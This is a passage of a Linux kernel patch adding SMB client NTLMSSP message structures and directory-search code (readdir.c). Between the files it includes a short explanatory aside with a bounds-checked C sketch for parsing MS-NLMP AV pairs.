++	char DomainString[0];
++	/* followed by WorkstationString */
++} __attribute__((packed)) NEGOTIATE_MESSAGE, *PNEGOTIATE_MESSAGE;
++
++#define NTLMSSP_REVISION_W2K3 0x0F
++
++/* See MS-NLMP section 2.2.2.10 */
++struct ntlmssp_version {
++	__u8	ProductMajorVersion;
++	__u8	ProductMinorVersion;
++	__le16	ProductBuild; /* we send the cifs.ko module version here */
++	__u8	Reserved[3];
++	__u8	NTLMRevisionCurrent; /* currently 0x0F */
++} __packed;
++
++/* see MS-NLMP section 2.2.1.1 */
++struct negotiate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
++	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
++	struct	ntlmssp_version Version;
++	/* SECURITY_BUFFER */
++	char DomainString[];
++	/* followed by WorkstationString */
++} __packed;
++
++typedef struct _CHALLENGE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;   /* NtLmChallenge = 2 */
++	SECURITY_BUFFER TargetName;
++	__le32 NegotiateFlags;
++	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
++	__u8 Reserved[8];
++	SECURITY_BUFFER TargetInfoArray;
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version-is-present flag */
++} __attribute__((packed)) CHALLENGE_MESSAGE, *PCHALLENGE_MESSAGE;
++
++typedef struct _AUTHENTICATE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
++	SECURITY_BUFFER LmChallengeResponse;
++	SECURITY_BUFFER NtChallengeResponse;
++	SECURITY_BUFFER DomainName;
++	SECURITY_BUFFER UserName;
++	SECURITY_BUFFER WorkstationName;
++	SECURITY_BUFFER SessionKey;
++	__le32 NegotiateFlags;
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version-is-present flag */
++	char UserString[0];
++} __attribute__((packed)) AUTHENTICATE_MESSAGE, *PAUTHENTICATE_MESSAGE;
++
++/*
++ * Size of the session key (crypto key encrypted with the password).
++ */
++
++int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len, struct cifs_ses *ses);
++int build_ntlmssp_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp);
++int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp);
++int build_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++			struct cifs_ses *ses,
++			struct TCP_Server_Info *server,
++			const struct nls_table *nls_cp);
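
The av_field_type IDs above index the AV (attribute/value) pair list that
a server packs into the challenge's TargetInfoArray: per MS-NLMP, each
pair is a little-endian 16-bit id, a 16-bit byte length, and the value,
and the list ends with an NTLMSSP_AV_EOL pair. A hedged, standalone
sketch of walking such a buffer (userspace stand-ins replace the kernel's
le16 helpers, and the blob contents are fabricated for illustration):

#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Stand-in for le16_to_cpu() on a little-endian byte buffer. */
static uint16_t get_le16(const unsigned char *p)
{
	return (uint16_t)(p[0] | (p[1] << 8));
}

/*
 * Walk an MS-NLMP AV_PAIR list: { AvId:le16, AvLen:le16, Value[AvLen] }
 * repeated, terminated by AvId == 0 (NTLMSSP_AV_EOL).
 * Returns 0 on a clean EOL, -1 on a malformed list.
 */
static int walk_av_pairs(const unsigned char *buf, size_t len)
{
	size_t off = 0;

	while (off + 4 <= len) {
		uint16_t id = get_le16(buf + off);
		uint16_t avlen = get_le16(buf + off + 2);

		if (id == 0)			/* NTLMSSP_AV_EOL */
			return 0;
		if (off + 4 + avlen > len)	/* value overruns buffer */
			return -1;
		printf("av pair id=%u len=%u\n", id, avlen);
		off += 4 + (size_t)avlen;
	}
	return -1;				/* no EOL before end */
}

int main(void)
{
	/* Fabricated blob: NB computer name "PC" (UTF-16LE), then EOL. */
	const unsigned char blob[] = {
		0x01, 0x00, 0x04, 0x00, 'P', 0x00, 'C', 0x00,
		0x00, 0x00, 0x00, 0x00
	};

	return walk_av_pairs(blob, sizeof(blob)) ? 1 : 0;
}

The same bounds discipline - header fits, then value fits - is what any
kernel-side consumer of the TargetInfoArray has to enforce before
trusting AvLen.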
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+new file mode 100644
+index 0000000000000..2d75ba5aaa8ad
+--- /dev/null
++++ b/fs/smb/client/readdir.c
+@@ -0,0 +1,1237 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Directory search handling
++ *
++ *   Copyright (C) International Business Machines  Corp., 2004, 2008
++ *   Copyright (C) Red Hat, Inc., 2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/pagemap.h>
++#include <linux/slab.h>
++#include <linux/stat.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifsfs.h"
++#include "smb2proto.h"
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/*
++ * To be safe - for UCS to UTF-8 conversion of strings loaded with rare
++ * long characters, allocate more to account for such multibyte target
++ * UTF-8 characters.
++ */
++#define UNICODE_NAME_MAX ((4 * NAME_MAX) + 2)
++
++#ifdef CONFIG_CIFS_DEBUG2
++static void dump_cifs_file_struct(struct file *file, char *label)
++{
++	struct cifsFileInfo *cf;
++
++	if (file) {
++		cf = file->private_data;
++		if (cf == NULL) {
++			cifs_dbg(FYI, "empty cifs private file data\n");
++			return;
++		}
++		if (cf->invalidHandle)
++			cifs_dbg(FYI, "Invalid handle\n");
++		if (cf->srch_inf.endOfSearch)
++			cifs_dbg(FYI, "end of search\n");
++		if (cf->srch_inf.emptyDir)
++			cifs_dbg(FYI, "empty dir\n");
++	}
++}
++#else
++static inline void dump_cifs_file_struct(struct file *file, char *label)
++{
++}
++#endif /* CONFIG_CIFS_DEBUG2 */
++
++/*
++ * Attempt to preload the dcache with the results from the FIND_FIRST/NEXT
++ *
++ * Find the dentry that matches "name". If there isn't one, create one. If it's
++ * a negative dentry or the uniqueid or filetype(mode) changed,
++ * then drop it and recreate it.
++ */
++static void
++cifs_prime_dcache(struct dentry *parent, struct qstr *name,
++		    struct cifs_fattr *fattr)
++{
++	struct dentry *dentry, *alias;
++	struct inode *inode;
++	struct super_block *sb = parent->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	DECLARE_WAIT_QUEUE_HEAD_ONSTACK(wq);
++
++	cifs_dbg(FYI, "%s: for %s\n", __func__, name->name);
++
++	dentry = d_hash_and_lookup(parent, name);
++	if (!dentry) {
++		/*
++		 * If we know that the inode will need to be revalidated
++		 * immediately, then don't create a new dentry for it.
++		 * We'll end up doing an on the wire call either way and
++		 * this spares us an invalidation.
++		 */
++		if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
++			return;
++retry:
++		dentry = d_alloc_parallel(parent, name, &wq);
++	}
++	if (IS_ERR(dentry))
++		return;
++	if (!d_in_lookup(dentry)) {
++		inode = d_inode(dentry);
++		if (inode) {
++			if (d_mountpoint(dentry)) {
++				dput(dentry);
++				return;
++			}
++			/*
++			 * If we're generating inode numbers, then we don't
++			 * want to clobber the existing one with the one that
++			 * the readdir code created.
++			 */
++			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM))
++				fattr->cf_uniqueid = CIFS_I(inode)->uniqueid;
++
++			/*
++			 * update inode in place if both i_ino and
++			 * i_mode didn't change
++			 */
++			if (CIFS_I(inode)->uniqueid == fattr->cf_uniqueid &&
++			    cifs_fattr_to_inode(inode, fattr) == 0) {
++				dput(dentry);
++				return;
++			}
++		}
++		d_invalidate(dentry);
++		dput(dentry);
++		goto retry;
++	} else {
++		inode = cifs_iget(sb, fattr);
++		if (!inode)
++			inode = ERR_PTR(-ENOMEM);
++		alias = d_splice_alias(inode, dentry);
++		d_lookup_done(dentry);
++		if (alias && !IS_ERR(alias))
++			dput(alias);
++	}
++	dput(dentry);
++}
++
++static bool reparse_file_needs_reval(const struct cifs_fattr *fattr)
++{
++	if (!(fattr->cf_cifsattrs & ATTR_REPARSE))
++		return false;
++	/*
++	 * The DFS tags should only be interpreted by the server side as per
++	 * MS-FSCC 2.1.2.1, but let's include them anyway.
++	 *
++	 * Besides, if cf_cifstag is unset (0), then we still need it to be
++	 * revalidated to know exactly what reparse point it is.
++	 */
++	switch (fattr->cf_cifstag) {
++	case IO_REPARSE_TAG_DFS:
++	case IO_REPARSE_TAG_DFSR:
++	case IO_REPARSE_TAG_SYMLINK:
++	case IO_REPARSE_TAG_NFS:
++	case 0:
++		return true;
++	}
++	return false;
++}
++
++static void
++cifs_fill_common_info(struct cifs_fattr *fattr, struct cifs_sb_info *cifs_sb)
++{
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++
++	/*
++	 * The IO_REPARSE_TAG_LX_ tags originally were used by WSL but they
++	 * are preferred by the Linux client in some cases since, unlike
++	 * the NFS reparse tag (or EAs), they don't require an extra query
++	 * to determine which type of special file they represent.
++	 * TODO: go through all documented reparse tags to see if we can
++	 * reasonably map some of them to directories vs. files vs. symlinks
++	 */
++	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
++		fattr->cf_dtype = DT_DIR;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_SYMLINK) {
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_LNK;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_FIFO) {
++		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_FIFO;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_AF_UNIX) {
++		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_SOCK;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_CHR) {
++		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_CHR;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_BLK) {
++		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_BLK;
++	} else { /* TODO: should we mark some other reparse points (like DFSR) as directories? */
++		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_REG;
++	}
++
++	/*
++	 * We need to revalidate it further to make a decision about whether it
++	 * is a symbolic link, DFS referral or a reparse point with a direct
++	 * access like junctions, deduplicated files, NFS symlinks.
++	 */
++	if (reparse_file_needs_reval(fattr))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	/* non-unix readdir doesn't provide nlink */
++	fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++
++	if (fattr->cf_cifsattrs & ATTR_READONLY)
++		fattr->cf_mode &= ~S_IWUGO;
++
++	/*
++	 * We of course don't get ACL info in FIND_FIRST/NEXT results, so
++	 * mark it for revalidation so that "ls -l" will look right. It might
++	 * be super-slow, but if we don't do this then the ownership of files
++	 * may look wrong since the inodes may not have timed out by the time
++	 * "ls" does a stat() call on them.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL &&
++	    fattr->cf_cifsattrs & ATTR_SYSTEM) {
++		if (fattr->cf_eof == 0) {
++			fattr->cf_mode &= ~S_IFMT;
++			fattr->cf_mode |= S_IFIFO;
++			fattr->cf_dtype = DT_FIFO;
++		} else {
++			/*
++			 * trying to get the type and mode via SFU can be slow,
++			 * so just call those regular files for now, and mark
++			 * for reval
++			 */
++			fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++		}
++	}
++}
++
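++/*
++ * Worked example (illustrative, not from the original source): for an
++ * entry carrying ATTR_DIRECTORY | ATTR_READONLY on a mount with
++ * dir_mode 0755, cifs_fill_common_info() above first sets cf_mode to
++ * S_IFDIR | 0755, then the ATTR_READONLY branch strips the write bits,
++ * leaving S_IFDIR | 0555 with cf_dtype == DT_DIR.
++ */
++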
++/* Fill a cifs_fattr struct with info from SMB_FIND_FILE_POSIX_INFO. */
++static void
++cifs_posix_to_fattr(struct cifs_fattr *fattr, struct smb2_posix_info *info,
++		    struct cifs_sb_info *cifs_sb)
++{
++	struct smb2_posix_info_parsed parsed;
++
++	posix_info_parse(info, NULL, &parsed);
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++
++	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
++	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
++
++	/*
++	 * Since we set the inode type below, we need to mask off the
++	 * type bits to avoid strange results if any were set above.
++	 * XXX: why not make server & client use the type bits?
++	 */
++	fattr->cf_mode = le32_to_cpu(info->Mode) & ~S_IFMT;
++
++	cifs_dbg(FYI, "posix fattr: dev %d, reparse %d, mode %o\n",
++		 le32_to_cpu(info->DeviceId),
++		 le32_to_cpu(info->ReparseTag),
++		 le32_to_cpu(info->Mode));
++
++	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++	} else {
++		/*
++		 * mark anything that is not a dir as regular
++		 * file. special files should have the REPARSE
++		 * attribute and will be marked as needing revaluation
++		 */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++	}
++
++	if (reparse_file_needs_reval(fattr))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	sid_to_id(cifs_sb, &parsed.owner, fattr, SIDOWNER);
++	sid_to_id(cifs_sb, &parsed.group, fattr, SIDGROUP);
++}
++
++static void __dir_info_to_fattr(struct cifs_fattr *fattr, const void *info)
++{
++	const FILE_DIRECTORY_INFO *fi = info;
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_cifsattrs = le32_to_cpu(fi->ExtFileAttributes);
++	fattr->cf_eof = le64_to_cpu(fi->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(fi->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(fi->CreationTime);
++	fattr->cf_atime = cifs_NTtimeToUnix(fi->LastAccessTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(fi->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(fi->LastWriteTime);
++}
++
++void
++cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
++		       struct cifs_sb_info *cifs_sb)
++{
++	__dir_info_to_fattr(fattr, info);
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
++				       SEARCH_ID_FULL_DIR_INFO *info,
++				       struct cifs_sb_info *cifs_sb)
++{
++	__dir_info_to_fattr(fattr, info);
++
++	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
++	if (fattr->cf_cifsattrs & ATTR_REPARSE)
++		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++static void
++cifs_std_info_to_fattr(struct cifs_fattr *fattr, FIND_FILE_STANDARD_INFO *info,
++		       struct cifs_sb_info *cifs_sb)
++{
++	int offset = cifs_sb_master_tcon(cifs_sb)->ses->server->timeAdj;
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_atime = cnvrtDosUnixTm(info->LastAccessDate,
++					    info->LastAccessTime, offset);
++	fattr->cf_ctime = cnvrtDosUnixTm(info->LastWriteDate,
++					    info->LastWriteTime, offset);
++	fattr->cf_mtime = cnvrtDosUnixTm(info->LastWriteDate,
++					    info->LastWriteTime, offset);
++
++	fattr->cf_cifsattrs = le16_to_cpu(info->Attributes);
++	fattr->cf_bytes = le32_to_cpu(info->AllocationSize);
++	fattr->cf_eof = le32_to_cpu(info->DataSize);
++
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++/*
++ * BB: eventually we need to add the following helper function to
++ * resolve the NT_STATUS_STOPPED_ON_SYMLINK return code when we try
++ * to do FindFirst on (NTFS) directory symlinks.
++ */
++/*
++int get_symlink_reparse_path(char *full_path, struct cifs_sb_info *cifs_sb,
++			     unsigned int xid)
++{
++	__u16 fid;
++	int len;
++	int oplock = 0;
++	int rc;
++	struct cifs_tcon *ptcon = cifs_sb_tcon(cifs_sb);
++	char *tmpbuffer;
++
++	rc = CIFSSMBOpen(xid, ptcon, full_path, FILE_OPEN, GENERIC_READ,
++			OPEN_REPARSE_POINT, &fid, &oplock, NULL,
++			cifs_sb->local_nls,
++			cifs_remap(cifs_sb));
++	if (!rc) {
++		tmpbuffer = kmalloc(maxpath, GFP_KERNEL);
++		rc = CIFSSMBQueryReparseLinkInfo(xid, ptcon, full_path,
++				tmpbuffer,
++				maxpath -1,
++				fid,
++				cifs_sb->local_nls);
++		if (CIFSSMBClose(xid, ptcon, fid)) {
++			cifs_dbg(FYI, "Error closing temporary reparsepoint open\n");
++		}
++	}
++}
++ */
++
++static int
++_initiate_cifs_search(const unsigned int xid, struct file *file,
++		     const char *full_path)
++{
++	__u16 search_flags;
++	int rc = 0;
++	struct cifsFileInfo *cifsFile;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++
++	if (file->private_data == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			return PTR_ERR(tlink);
++
++		cifsFile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
++		if (cifsFile == NULL) {
++			rc = -ENOMEM;
++			goto error_exit;
++		}
++		spin_lock_init(&cifsFile->file_info_lock);
++		file->private_data = cifsFile;
++		cifsFile->tlink = cifs_get_tlink(tlink);
++		tcon = tlink_tcon(tlink);
++	} else {
++		cifsFile = file->private_data;
++		tcon = tlink_tcon(cifsFile->tlink);
++	}
++
++	server = tcon->ses->server;
++
++	if (!server->ops->query_dir_first) {
++		rc = -ENOSYS;
++		goto error_exit;
++	}
++
++	cifsFile->invalidHandle = true;
++	cifsFile->srch_inf.endOfSearch = false;
++
++	cifs_dbg(FYI, "Full path: %s start at: %lld\n", full_path, file->f_pos);
++
++ffirst_retry:
++	/*
++	 * Test for Unix extensions, but now check for them on the
++	 * share/mount, not on the SMB session:
++	 * if (cap_unix(tcon->ses)) { ...
++	 */
++	if (tcon->unix_ext)
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_UNIX;
++	else if (tcon->posix_extensions)
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_POSIX_INFO;
++	else if ((tcon->ses->capabilities &
++		  tcon->ses->server->vals->cap_nt_find) == 0) {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_INFO_STANDARD;
++	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
++	} else /* not srvinos - BB fixme add check for backlevel? */ {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++	}
++
++	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
++	if (backup_cred(cifs_sb))
++		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
++
++	rc = server->ops->query_dir_first(xid, tcon, full_path, cifs_sb,
++					  &cifsFile->fid, search_flags,
++					  &cifsFile->srch_inf);
++
++	if (rc == 0)
++		cifsFile->invalidHandle = false;
++	/* BB add following call to handle readdir on new NTFS symlink errors
++	else if STATUS_STOPPED_ON_SYMLINK
++		call get_symlink_reparse_path and retry with new path */
++	else if ((rc == -EOPNOTSUPP) &&
++		(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++		goto ffirst_retry;
++	}
++error_exit:
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int
++initiate_cifs_search(const unsigned int xid, struct file *file,
++		     const char *full_path)
++{
++	int rc, retry_count = 0;
++
++	do {
++		rc = _initiate_cifs_search(xid, file, full_path);
++		/*
++		 * If we don't have enough credits to start reading the
++		 * directory just try again after short wait.
++		 */
++		if (rc != -EDEADLK)
++			break;
++
++		usleep_range(512, 2048);
++	} while (retry_count++ < 5);
++
++	return rc;
++}
++
++/* return length of unicode string in bytes */
++static int cifs_unicode_bytelen(const char *str)
++{
++	int len;
++	const __le16 *ustr = (const __le16 *)str;
++
++	for (len = 0; len <= PATH_MAX; len++) {
++		if (ustr[len] == 0)
++			return len << 1;
++	}
++	cifs_dbg(FYI, "Unicode string longer than PATH_MAX found\n");
++	return len << 1;
++}
++
++static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
++{
++	char *new_entry;
++	FILE_DIRECTORY_INFO *pDirInfo = (FILE_DIRECTORY_INFO *)old_entry;
++
++	if (level == SMB_FIND_FILE_INFO_STANDARD) {
++		FIND_FILE_STANDARD_INFO *pfData;
++
++		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
++
++		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
++				pfData->FileNameLength;
++	} else {
++		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
++
++		if (old_entry + next_offset < old_entry) {
++			cifs_dbg(VFS, "Invalid offset %u\n", next_offset);
++			return NULL;
++		}
++		new_entry = old_entry + next_offset;
++	}
++	cifs_dbg(FYI, "new entry %p old entry %p\n", new_entry, old_entry);
++	/* validate that new_entry is not past end of SMB */
++	if (new_entry >= end_of_smb) {
++		cifs_dbg(VFS, "search entry %p began after end of SMB %p old entry %p\n",
++			 new_entry, end_of_smb, old_entry);
++		return NULL;
++	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
++		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
++		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
++		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
++		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
++			 new_entry, end_of_smb);
++		return NULL;
++	} else
++		return new_entry;
++}
++
++struct cifs_dirent {
++	const char	*name;
++	size_t		namelen;
++	u32		resume_key;
++	u64		ino;
++};
++
++static void cifs_fill_dirent_posix(struct cifs_dirent *de,
++				   const struct smb2_posix_info *info)
++{
++	struct smb2_posix_info_parsed parsed;
++
++	/* payload should have already been checked at this point */
++	if (posix_info_parse(info, NULL, &parsed) < 0) {
++		cifs_dbg(VFS, "Invalid POSIX info payload\n");
++		return;
++	}
++
++	de->name = parsed.name;
++	de->namelen = parsed.name_len;
++	de->resume_key = info->Ignored;
++	de->ino = le64_to_cpu(info->Inode);
++}
++
++static void cifs_fill_dirent_unix(struct cifs_dirent *de,
++		const FILE_UNIX_INFO *info, bool is_unicode)
++{
++	de->name = &info->FileName[0];
++	if (is_unicode)
++		de->namelen = cifs_unicode_bytelen(de->name);
++	else
++		de->namelen = strnlen(de->name, PATH_MAX);
++	de->resume_key = info->ResumeKey;
++	de->ino = le64_to_cpu(info->basic.UniqueId);
++}
++
++static void cifs_fill_dirent_dir(struct cifs_dirent *de,
++		const FILE_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_full(struct cifs_dirent *de,
++		const FILE_FULL_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_search(struct cifs_dirent *de,
++		const SEARCH_ID_FULL_DIR_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++	de->ino = le64_to_cpu(info->UniqueId);
++}
++
++static void cifs_fill_dirent_both(struct cifs_dirent *de,
++		const FILE_BOTH_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_std(struct cifs_dirent *de,
++		const FIND_FILE_STANDARD_INFO *info)
++{
++	de->name = &info->FileName[0];
++	/* one byte length, no endianness conversion */
++	de->namelen = info->FileNameLength;
++	de->resume_key = info->ResumeKey;
++}
++
++static int cifs_fill_dirent(struct cifs_dirent *de, const void *info,
++		u16 level, bool is_unicode)
++{
++	memset(de, 0, sizeof(*de));
++
++	switch (level) {
++	case SMB_FIND_FILE_POSIX_INFO:
++		cifs_fill_dirent_posix(de, info);
++		break;
++	case SMB_FIND_FILE_UNIX:
++		cifs_fill_dirent_unix(de, info, is_unicode);
++		break;
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		cifs_fill_dirent_dir(de, info);
++		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		cifs_fill_dirent_full(de, info);
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		cifs_fill_dirent_search(de, info);
++		break;
++	case SMB_FIND_FILE_BOTH_DIRECTORY_INFO:
++		cifs_fill_dirent_both(de, info);
++		break;
++	case SMB_FIND_FILE_INFO_STANDARD:
++		cifs_fill_dirent_std(de, info);
++		break;
++	default:
++		cifs_dbg(FYI, "Unknown findfirst level %d\n", level);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++#define UNICODE_DOT cpu_to_le16(0x2e)
++
++/* return 0 if no match and 1 for . (current directory) and 2 for .. (parent) */
++static int cifs_entry_is_dot(struct cifs_dirent *de, bool is_unicode)
++{
++	int rc = 0;
++
++	if (!de->name)
++		return 0;
++
++	if (is_unicode) {
++		__le16 *ufilename = (__le16 *)de->name;
++		if (de->namelen == 2) {
++			/* check for . */
++			if (ufilename[0] == UNICODE_DOT)
++				rc = 1;
++		} else if (de->namelen == 4) {
++			/* check for .. */
++			if (ufilename[0] == UNICODE_DOT &&
++			    ufilename[1] == UNICODE_DOT)
++				rc = 2;
++		}
++	} else /* ASCII */ {
++		if (de->namelen == 1) {
++			if (de->name[0] == '.')
++				rc = 1;
++		} else if (de->namelen == 2) {
++			if (de->name[0] == '.' && de->name[1] == '.')
++				rc = 2;
++		}
++	}
++
++	return rc;
++}
++
++/*
++ * Check if the directory that we are searching has changed so we can
++ * decide whether we can use the cached search results from the
++ * previous search.
++ */
++static int is_dir_changed(struct file *file)
++{
++	struct inode *inode = file_inode(file);
++	struct cifsInodeInfo *cifsInfo = CIFS_I(inode);
++
++	if (cifsInfo->time == 0)
++		return 1; /* directory was changed, perhaps due to unlink */
++
++	return 0;
++}
++
++static int cifs_save_resume_key(const char *current_entry,
++	struct cifsFileInfo *file_info)
++{
++	struct cifs_dirent de;
++	int rc;
++
++	rc = cifs_fill_dirent(&de, current_entry, file_info->srch_inf.info_level,
++			      file_info->srch_inf.unicode);
++	if (!rc) {
++		file_info->srch_inf.presume_name = de.name;
++		file_info->srch_inf.resume_name_len = de.namelen;
++		file_info->srch_inf.resume_key = de.resume_key;
++	}
++	return rc;
++}
++
++/*
++ * Find the corresponding entry in the search. Note that the SMB server returns
++ * search entries for . and .. which complicates logic here if we choose to
++ * parse for them and we do not assume that they are located in the findfirst
++ * return buffer. We start counting in the buffer with entry 2 and increment for
++ * every entry (do not increment for . or .. entry).
++ */
++static int
++find_cifs_entry(const unsigned int xid, struct cifs_tcon *tcon, loff_t pos,
++		struct file *file, const char *full_path,
++		char **current_entry, int *num_to_ret)
++{
++	__u16 search_flags;
++	int rc = 0;
++	int pos_in_buf = 0;
++	loff_t first_entry_in_buffer;
++	loff_t index_to_find = pos;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	/* check if the index is in the buffer */
++
++	if (!server->ops->query_dir_first || !server->ops->query_dir_next)
++		return -ENOSYS;
++
++	if ((cfile == NULL) || (current_entry == NULL) || (num_to_ret == NULL))
++		return -ENOENT;
++
++	*current_entry = NULL;
++	first_entry_in_buffer = cfile->srch_inf.index_of_last_entry -
++					cfile->srch_inf.entries_in_buffer;
++
++	/*
++	 * If the first entry in the buffer is zero, then this is the
++	 * first buffer in the search response data, which means it is
++	 * likely that . and .. will be in this buffer; although some
